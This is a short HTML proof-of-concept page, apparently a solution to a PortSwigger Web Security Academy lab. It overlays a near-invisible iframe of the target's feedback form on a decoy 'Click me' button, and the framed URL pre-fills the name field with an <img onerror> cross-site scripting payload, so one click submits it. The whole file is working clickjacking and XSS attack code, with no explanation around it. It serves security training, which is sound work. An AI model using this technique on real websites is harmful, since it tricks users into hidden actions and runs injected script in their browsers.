<head>
    <style>
        #target_website {
            position:relative;
            width:200px;
            height:300px;
            opacity:0.00001;
            z-index:2;
            }
        #decoy_website {
            position:absolute;
            width:300px;
            height:300px;
            z-index:1;
            }
        #button {
          text-align: center;
          display: inline-block;
          font-size: 16px;
          margin: 185px 50px;
          width: 100px;
          height: 30px;
        }
    </style>
</head>
<body>
<div id="decoy_website">
    <button id="button">Click me</button>
</div>
<iframe id="target_website" src="https://???.web-security-academy.net/feedback?name=%3Cimg%20src=1%20onerror=print()%3E&email=xx@att.com&subject=x&message=xxx#feedbackResult">
</iframe>
</body>
